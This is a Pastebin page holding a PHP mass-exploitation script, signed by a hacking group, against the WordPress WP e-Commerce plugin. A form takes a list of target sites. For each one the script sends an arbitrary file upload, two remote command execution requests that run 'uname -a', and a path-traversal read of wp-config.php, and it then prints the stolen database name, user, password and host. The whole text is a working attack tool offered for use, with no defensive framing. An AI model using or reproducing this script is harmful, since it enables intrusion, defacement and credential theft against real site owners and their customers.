Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>WP E-COMMERCE</title>
- <body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>© </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br>
- <form method='POST'>
- <textarea name='sites' cols='45' rows='15'></textarea>
- <br>
- _______________________________________________________________
- <br><input style="background:dodgerblue;margin:0px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" value="EXECUTE" type="submit"><br><br><br>
- </form>
- <?php
- @set_time_limit(0);
- $sites = explode("\r\n", $_POST['sites']);
- foreach($sites as $target) {
- $target = trim($target);
- /*AFU*/
- /*
- - file : save-data.functions.php
- - lines : 486.. 504
- line : 500
- move_uploaded_file( $_FILES['image']['tmp_name'], $new_image_path );
- */
- $headers = array("Content-Type: application/octet-stream",
- "Content-Disposition: form-data; name=\"image\"; file=\"lol.gif\"");
- $uploadfile="AZZATSSINS WAS HERE";
- $ch = curl_init($target."/wp-e-commerce/wpsc-admin/includes/save-
- data.functions.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('image'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- /*RCE 1*/
- /*
- - file : ajax.php
- - lines : 38 , 41 , 57
- $callback = "_wpsc_ajax_{$ajax_action}";
- call_user_func $result = call_user_func($callback);
- $ajax_action = str_replace('-', '_', $_REQUEST['wpsc_action']);
- */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-admin/
- ajax.php?wpsc_action=uname+-a");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $buf = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
- echo $buf;
- /*RCE 2*/
- /*
- - file : display-sales-logs.php
- - line : 23
- $controller = $_REQUEST['c'];
- */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-admin/
- display-sales-logs.php?c=uname+-a");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $buf = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
- echo $buf;
- /*LFI/LFD*/
- /*
- - file: misc.functions.php
- - lines : 280 .. 355
- * multiple bug in function imagecreatefromgif() , you can use any param's to
- exploit it.
- * param's : [ image_name , category_id , wpsc_request_image , productid ,
- image_id ]
- */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-includes/
- misc.functions.php?image_name=../../../wp-config.php");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $xp = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
- if(preg_match("#DB_USER#i",$xp)){
- preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}<br>";
- preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}<br>";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
- preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}<br>";
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement